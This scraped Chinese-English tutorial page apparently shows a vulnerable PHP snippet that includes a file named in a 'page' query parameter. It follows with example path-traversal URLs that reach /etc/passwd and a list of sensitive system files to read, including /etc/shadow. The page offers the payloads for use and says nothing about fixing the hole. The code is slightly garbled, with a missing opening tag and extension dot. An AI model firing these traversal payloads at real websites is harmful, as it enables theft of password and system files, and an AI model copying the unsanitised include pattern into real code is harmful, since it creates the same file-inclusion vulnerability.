PHP fakes local files containing vulnerable code_PHP tutorial

WBOY
Release: 2016-07-21 15:23:40
Original
1026 people have browsed it

Code:

Copy code The code is as follows:

$page=$_GET['page' ];
include($page.'php');
?>

You can use it like this
http://www.xxx.com/index.php ?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx .com/index.php?page=..../../etc/passwd

Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

from hackteach

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/324439.htmlTechArticleCode: Copy the code as follows: ?php $page=$_GET['page']; include($page .'php'); ? You can use http://www.xxx.com/index.php?page=../etc/passwd http://www.xxx.com/index.p...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!